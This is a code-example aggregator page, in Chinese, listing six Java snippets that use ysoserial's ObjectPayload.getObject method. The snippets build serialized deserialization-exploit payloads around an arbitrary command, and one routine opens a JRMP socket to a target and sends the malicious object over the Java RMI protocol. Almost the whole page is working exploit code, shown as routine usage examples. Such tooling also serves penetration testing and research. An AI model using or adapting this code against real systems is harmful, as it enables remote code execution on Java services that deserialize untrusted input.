本文整理汇总了Java中ysoserial.payloads.ObjectPayload.getObject方法的典型用法代码示例。如果您正苦于以下问题:Java ObjectPayload.getObject方法的具体用法?Java ObjectPayload.getObject怎么用?Java ObjectPayload.getObject使用的例子?那么恭喜您, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在类ysoserial.payloads.ObjectPayload的用法示例。
在下文中一共展示了ObjectPayload.getObject方法的6个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Java代码示例。
示例1: getExploitPayload
import ysoserial.payloads.ObjectPayload; //导入方法依赖的package包/类
private static byte[] getExploitPayload(String payloadType, String command){
final Class<? extends ObjectPayload> payloadClass = ObjectPayload.Utils.getPayloadClass(payloadType.split(" ")[0]);
byte[] exploitPayload = new byte[0];
try {
final ObjectPayload payload = payloadClass.newInstance();
final Object object = payload.getObject(command);
exploitPayload = Serializer.serialize(object);
} catch (Throwable e) {
System.err.println("Error while generating or serializing payload");
e.printStackTrace();
}
return exploitPayload;
}
示例2: generate
import ysoserial.payloads.ObjectPayload; //导入方法依赖的package包/类
public Object generate(String type, String command) {
final Class<? extends ObjectPayload> payloadClass = getPayloadClass(type);
try {
ObjectPayload payload = payloadClass.newInstance();
Object object = payload.getObject(command);
return object;
} catch (Throwable e) {
System.err.println("Error while generating or serializing payload.");
e.printStackTrace();
System.exit(1);
return null;
}
}
示例3: main
import ysoserial.payloads.ObjectPayload; //导入方法依赖的package包/类
public static void main(final String[] args) {
if (args.length != 2) {
printUsage();
System.exit(USAGE_CODE);
}
final String payloadType = args[0];
final String command = args[1];
final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
if (payloadClass == null) {
System.err.println("Invalid payload type '" + payloadType + "'");
printUsage();
System.exit(USAGE_CODE);
return; // make null analysis happy
}
try {
final ObjectPayload payload = payloadClass.newInstance();
final Object object = payload.getObject(command);
PrintStream out = System.out;
Serializer.serialize(object, out);
ObjectPayload.Utils.releasePayload(payload, object);
} catch (Throwable e) {
System.err.println("Error while generating or serializing payload");
e.printStackTrace();
System.exit(INTERNAL_ERROR_CODE);
}
System.exit(0);
}
示例4: main
import ysoserial.payloads.ObjectPayload; //导入方法依赖的package包/类
public static void main(final String[] args) {
if (args.length != 3) {
printUsage();
System.exit(USAGE_CODE);
}
final String payloadType = args[0];
final String terminalType = args[1];
final String command = args[2];
final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
if (payloadClass == null) {
System.err.println("Invalid payload type '" + payloadType + "'");
printUsage();
System.exit(USAGE_CODE);
return; // make null analysis happy
}
if (!terminalTypes.contains(terminalType)) {
System.err.println("Invalid terminal type '" + terminalType + "'");
printUsage();
System.exit(USAGE_CODE);
return; // make null analysis happy
}
try {
final ObjectPayload payload = payloadClass.newInstance();
CmdExecuteHelper cmdHelper = new CmdExecuteHelper(terminalType, command);
final Object object = payload.getObject(cmdHelper);
PrintStream out = System.out;
Serializer.serialize(object, out);
ObjectPayload.Utils.releasePayload(payload, object);
} catch (Throwable e) {
System.err.println("Error while generating or serializing payload");
e.printStackTrace();
System.exit(INTERNAL_ERROR_CODE);
}
System.exit(0);
}
示例5: main
import ysoserial.payloads.ObjectPayload; //导入方法依赖的package包/类
public static void main(final String[] args) {
if (args.length != 2) {
printUsage();
System.exit(USAGE_CODE);
}
final String payloadType = args[0];
final String command = args[1];
final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
if (payloadClass == null) {
System.err.println("Invalid payload type '" + payloadType + "'");
printUsage();
System.exit(USAGE_CODE);
}
try {
final ObjectPayload payload = payloadClass.newInstance();
final Object object = payload.getObject(command);
PrintStream out = System.out;
Serializer.serialize(object, out);
} catch (Throwable e) {
System.err.println("Error while generating or serializing payload");
e.printStackTrace();
System.exit(INTERNAL_ERROR_CODE);
}
System.exit(0);
}
示例6: exploit
import ysoserial.payloads.ObjectPayload; //导入方法依赖的package包/类
private static void exploit ( InetSocketAddress isa, long obj, int o1, long o2, short o3, Class<?> payloadClass, String payloadArg )
throws IOException {
Socket s = null;
DataOutputStream dos = null;
try {
System.err.println("* Opening JRMP socket " + isa);
s = SocketFactory.getDefault().createSocket(isa.getAddress(), isa.getPort());
s.setKeepAlive(true);
s.setTcpNoDelay(true);
OutputStream os = s.getOutputStream();
dos = new DataOutputStream(os);
dos.writeInt(TransportConstants.Magic);
dos.writeShort(TransportConstants.Version);
dos.writeByte(TransportConstants.SingleOpProtocol);
dos.write(TransportConstants.Call);
@SuppressWarnings ( "resource" )
final ObjectOutputStream objOut = new JRMPClient.MarshalOutputStream(dos);
objOut.writeLong(obj);
objOut.writeInt(o1);
objOut.writeLong(o2);
objOut.writeShort(o3);
objOut.writeInt(-1);
objOut.writeLong(Util.computeMethodHash(ActivationInstantiator.class.getMethod("newInstance", ActivationID.class, ActivationDesc.class)));
final ObjectPayload payload = (ObjectPayload) payloadClass.newInstance();
final Object object = payload.getObject(payloadArg);
objOut.writeObject(object);
os.flush();
ObjectPayload.Utils.releasePayload(payload, object);
}
catch ( Exception e ) {
e.printStackTrace(System.err);
}
finally {
if ( dos != null ) {
dos.close();
}
if ( s != null ) {
s.close();
}
}
}